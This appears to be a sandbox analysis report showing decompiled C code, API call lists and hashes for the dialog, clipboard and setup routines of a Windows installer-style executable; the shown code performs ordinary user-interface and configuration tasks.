              0x00000000
              0x004052d2
              0x0040525b
              0x00405208
              0x00405238
              0x00405240
              0x0040524b
              0x0040524b
              0x00405252
              0x00000000
              0x00405252
              0x0040520c
              0x00405216
              0x00000000
              0x004051dd
              0x004051e3
              0x0040521b
              0x00000000
              0x00405224
              0x004051ec
              0x004051f1
              0x004051f4
              0x00000000
              0x004051f4
              0x004051db
              0x00405012
              0x00405016
              0x0040501f
              0x00405026
              0x00405029
              0x0040502c
              0x0040502f
              0x00405030
              0x00405031
              0x0040504a
              0x0040504d
              0x00405057
              0x00405066
              0x0040506e
              0x00405076
              0x0040507b
              0x0040507e
              0x0040508a
              0x00405093
              0x0040509c
              0x004050bf
              0x004050c5
              0x004050d6
              0x004050db
              0x004050e9
              0x004050f7
              0x004050f7
              0x004050fc
              0x0040510a
              0x0040510a
              0x0040510f
              0x00405112
              0x00405117
              0x00405123
              0x0040512c
              0x00405139
              0x00405148
              0x0040513b
              0x00405140
              0x00405140
              0x00405154
              0x00405154
              0x00405168
              0x00405171
              0x0040517a
              0x0040518a
              0x00405196
              0x00405196
              0x00000000

              APIs
              • GetDlgItem.USER32(?,00000403), ref: 00405050
              • GetDlgItem.USER32(?,000003EE), ref: 0040505F
              • GetClientRect.USER32 ref: 0040509C
              • GetSystemMetrics.USER32 ref: 004050A4
              • SendMessageA.USER32 ref: 004050C5
              • SendMessageA.USER32 ref: 004050D6
              • SendMessageA.USER32 ref: 004050E9
              • SendMessageA.USER32 ref: 004050F7
              • SendMessageA.USER32 ref: 0040510A
              • ShowWindow.USER32(00000000,?), ref: 0040512C
              • ShowWindow.USER32(?,00000008), ref: 00405140
              • GetDlgItem.USER32(?,000003EC), ref: 00405161
              • SendMessageA.USER32 ref: 00405171
              • SendMessageA.USER32 ref: 0040518A
              • SendMessageA.USER32 ref: 00405196
              • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
              • GetDlgItem.USER32(?,000003EC), ref: 004051B3
              • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
              • CloseHandle.KERNEL32(00000000), ref: 004051C8
              • ShowWindow.USER32(00000000), ref: 004051EC
              • ShowWindow.USER32(?,00000008), ref: 004051F1
              • ShowWindow.USER32(00000008), ref: 00405238
              • SendMessageA.USER32 ref: 0040526A
              • CreatePopupMenu.USER32 ref: 0040527B
              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
              • GetWindowRect.USER32 ref: 004052A3
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
              • SendMessageA.USER32 ref: 00405302
              • OpenClipboard.USER32(00000000), ref: 00405312
              • EmptyClipboard.USER32 ref: 00405318
              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
              • GlobalLock.KERNEL32 ref: 0040532B
              • SendMessageA.USER32 ref: 0040533F
              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
              • SetClipboardData.USER32 ref: 00405362
              • CloseClipboard.USER32 ref: 00405368
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: {
              • API String ID: 590372296-366298937
              • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
              • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004039B0, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408);
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44;
							if(_t39 ==  *0x42ec44) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133;
							if( *0x42e3ec != _t133) {
								break;
							}
							__eflags =  *0x4091ac -  *0x42ec44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133;
							_v32 = _t49;
							if( *0x42ecac != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133;
							if( *0x42ecac == _t133) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, 0x42e420);
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133;
									if( *0x42e3ec != _t133) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133;
								if( *0x42ecac != _t133) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133;
								if( *0x42eca0 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec;
						return 0 |  *0x42e3ec == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133;
										if( *0x42ecac == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133 &&  *0x42e3f8 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x42b0a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























              0x004039b9
              0x004039c2
              0x00403b03
              0x00403b07
              0x00403b0b
              0x00403b0d
              0x00403b12
              0x00403b1d
              0x00403b28
              0x00403b2d
              0x00403b2f
              0x00403b31
              0x00403b34
              0x00403b39
              0x00403b47
              0x00403b54
              0x00403b5b
              0x00403b5b
              0x00403b5c
              0x00403b5c
              0x00403b61
              0x00403b67
              0x00403b6e
              0x00403b74
              0x00403b76
              0x00403bb6
              0x00403bbb
              0x00403bc0
              0x00403bc0
              0x00403bc5
              0x00403bce
              0x00403bd0
              0x00403bd5
              0x00403bdb
              0x00403bdf
              0x00403bdf
              0x00403be4
              0x00403bea
              0x00000000
              0x00000000
              0x00403bf5
              0x00403bfb
              0x00000000
              0x00000000
              0x00403c04
              0x00403c0c
              0x00403c11
              0x00403c14
              0x00403c1a
              0x00403c1f
              0x00403c22
              0x00403c28
              0x00403c2d
              0x00403c30
              0x00403c36
              0x00403c3e
              0x00403c44
              0x00403c4a
              0x00403c4e
              0x00403c55
              0x00403c55
              0x00403c55
              0x00403c5f
              0x00403c71
              0x00403c7d
              0x00403c82
              0x00403c8c
              0x00403c92
              0x00403c94
              0x00403c99
              0x00403c96
              0x00403c96
              0x00403c96
              0x00403ca9
              0x00403cc1
              0x00403cc3
              0x00403cc9
              0x00403cde
              0x00403ccb
              0x00403cd4
              0x00403cd6
              0x00403cd6
              0x00403ce4
              0x00403cf4
              0x00403d05
              0x00403d0c
              0x00403d12
              0x00403d16
              0x00403d1b
              0x00403d1d
              0x00000000
              0x00403d23
              0x00403d23
              0x00403d25
              0x00000000
              0x00000000
              0x00403d2b
              0x00403d2f
              0x00403d54
              0x00403d5a
              0x00403d60
              0x00403d62
              0x00000000
              0x00000000
              0x00403d88
              0x00403d8e
              0x00403d90
              0x00403d95
              0x00000000
              0x00000000
              0x00403d9b
              0x00403d9e
              0x00403da1
              0x00403db8
              0x00403dc4
              0x00403ddd
              0x00403de3
              0x00403de7
              0x00403dec
              0x00403df2
              0x00000000
              0x00000000
              0x00403dfc
              0x00403e07
              0x00000000
              0x00403e07
              0x00403d31
              0x00403d37
              0x00000000
              0x00000000
              0x00403d3d
              0x00403d43
              0x00000000
              0x00000000
              0x00000000
              0x00403d49
              0x00403d1d
              0x00403e14
              0x00403e20
              0x00403e27
              0x00000000
              0x00403b78
              0x00403b78
              0x00403b7b
              0x00403bae
              0x00403bae
              0x00403bb0
              0x00000000
              0x00000000
              0x00000000
              0x00403bb0
              0x00403b7d
              0x00403b81
              0x00403b86
              0x00403b88
              0x00000000
              0x00000000
              0x00403b98
              0x00403ba0
              0x00000000
              0x00403ba6
              0x004039d4
              0x004039d4
              0x004039d8
              0x004039dd
              0x004039ec
              0x004039ec
              0x004039f5
              0x004039fe
              0x00403a09
              0x00403a09
              0x00403a15
              0x00403a31
              0x00403a34
              0x00403a47
              0x00403a4d
              0x00403af0
              0x00000000
              0x00403af9
              0x00403a53
              0x00403a60
              0x00403a62
              0x00403a64
              0x00403a83
              0x00403a83
              0x00403a86
              0x00403a8b
              0x00403a8e
              0x00403a9e
              0x00403a9f
              0x00403aa1
              0x00403ad7
              0x00403aea
              0x00000000
              0x00403aea
              0x00403aa3
              0x00403aa9
              0x00403ac2
              0x00403ac7
              0x00403ac9
              0x00000000
              0x00000000
              0x00403acb
              0x00403ab7
              0x00403ab7
              0x00403ab9
              0x00403ab9
              0x00000000
              0x00403ab9
              0x00403aac
              0x00403ab1
              0x00000000
              0x00403ab1
              0x00403a90
              0x00403a96
              0x00000000
              0x00000000
              0x00403a98
              0x00000000
              0x00403a98
              0x00403a88
              0x00000000
              0x00403a88
              0x00403a6e
              0x00403a75
              0x00403a7b
              0x00403a7d
              0x00000000
              0x00000000
              0x00000000
              0x00403a7d
              0x00403a39
              0x00000000
              0x00403a17
              0x00403a1d
              0x00403a27
              0x00403e2d
              0x00403e33
              0x00403e40
              0x00403e46
              0x00403e46
              0x00403e50
              0x00000000
              0x00403e50
              0x00403a15

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
              • ShowWindow.USER32(?), ref: 00403A09
              • DestroyWindow.USER32 ref: 00403A1D
              • SetWindowLongA.USER32 ref: 00403A39
              • GetDlgItem.USER32(?,?), ref: 00403A5A
              • SendMessageA.USER32 ref: 00403A6E
              • IsWindowEnabled.USER32(00000000), ref: 00403A75
              • GetDlgItem.USER32(?,00000001), ref: 00403B23
              • GetDlgItem.USER32(?,00000002), ref: 00403B2D
              • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
              • SendMessageA.USER32 ref: 00403B98
              • GetDlgItem.USER32(?,00000003), ref: 00403C3E
              • ShowWindow.USER32(00000000,?), ref: 00403C5F
              • EnableWindow.USER32(?,?), ref: 00403C71
              • EnableWindow.USER32(?,?), ref: 00403C8C
              • GetSystemMenu.USER32 ref: 00403CA2
              • EnableMenuItem.USER32 ref: 00403CA9
              • SendMessageA.USER32 ref: 00403CC1
              • SendMessageA.USER32 ref: 00403CD4
              • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,0042E420), ref: 00403CFD
              • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
              • ShowWindow.USER32(?,0000000A), ref: 00403E40
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID:
              • API String ID: 184305955-0
              • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
              • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
              • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
              • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403FCB, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42e3fc - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42ec58;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42ec30 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}

















              0x00403fdb
              0x00404101
              0x0040415d
              0x00404161
              0x00404238
              0x0040423a
              0x0040423a
              0x00404240
              0x00404240
              0x00404243
              0x00000000
              0x0040424a
              0x0040416f
              0x00404171
              0x0040417b
              0x00404186
              0x00404189
              0x0040418c
              0x00404197
              0x0040419a
              0x004041a1
              0x004041af
              0x004041c7
              0x004041da
              0x004041ea
              0x004041ec
              0x004041ec
              0x004041a1
              0x004041f6
              0x00000000
              0x00404201
              0x00404205
              0x00404216
              0x00404216
              0x0040421c
              0x0040422a
              0x0040422a
              0x00000000
              0x0040422e
              0x004041f6
              0x0040410c
              0x00000000
              0x00404120
              0x00404126
              0x0040412c
              0x00000000
              0x00000000
              0x00404151
              0x00404153
              0x00404158
              0x00000000
              0x00404158
              0x0040410c
              0x00403fe1
              0x00403fe4
              0x00403fe9
              0x00403ffa
              0x00403ffa
              0x00404001
              0x00404004
              0x00404006
              0x0040400b
              0x00404014
              0x0040401a
              0x00404026
              0x00404029
              0x00404032
              0x00404037
              0x0040403a
              0x0040403f
              0x00404056
              0x0040405d
              0x00404070
              0x00404073
              0x00404088
              0x0040408f
              0x00404094
              0x00404099
              0x00404099
              0x004040a8
              0x004040b7
              0x004040b9
              0x004040cf
              0x004040de
              0x004040e0
              0x00000000

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
              • String ID: N$open
              • API String ID: 3615053054-904208323
              • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
              • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040361A, Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30;
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					 *0x435000 = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA(0x435000, _t79);
				} else {
					E00405B25(0x435000,  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				 *0x42eca0 =  *0x42ec38 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, 0x434400) != 0) {
					L16:
					if(E0040579B(_t96, 0x434400) == 0) {
						E00405BE9(0, _t79, _t81, 0x434400,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040);
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0;
							if( *0x42ecc0 != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec;
								if( *0x42e3ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5);
							_t37 = E00405EE9("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t42 = DialogBoxParamA( *0x42ec20,  *0x42e400 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0);
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20;
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 =  *0x42ec20;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x42ec58, 0x42dbc0, 0);
					_t62 =  *0x42dbc0;
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(0x434400, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























              0x00403620
              0x00403629
              0x00403630
              0x00403632
              0x00403646
              0x00403658
              0x00403662
              0x00403667
              0x0040366d
              0x00403680
              0x00403680
              0x0040368b
              0x00403634
              0x0040363f
              0x0040363f
              0x00403690
              0x004036a3
              0x004036a8
              0x004036b9
              0x00403740
              0x00403748
              0x00403751
              0x00403751
              0x00403767
              0x0040376d
              0x0040377b
              0x0040380a
              0x00403812
              0x0040381c
              0x00403821
              0x00403827
              0x004038b1
              0x004038b6
              0x004038b8
              0x004038d4
              0x00000000
              0x004038d4
              0x004038ba
              0x004038c0
              0x004038c8
              0x004038c8
              0x00000000
              0x004038c0
              0x00403835
              0x00403840
              0x00403845
              0x00403847
              0x0040384e
              0x0040384e
              0x00403859
              0x00403861
              0x00403863
              0x00403865
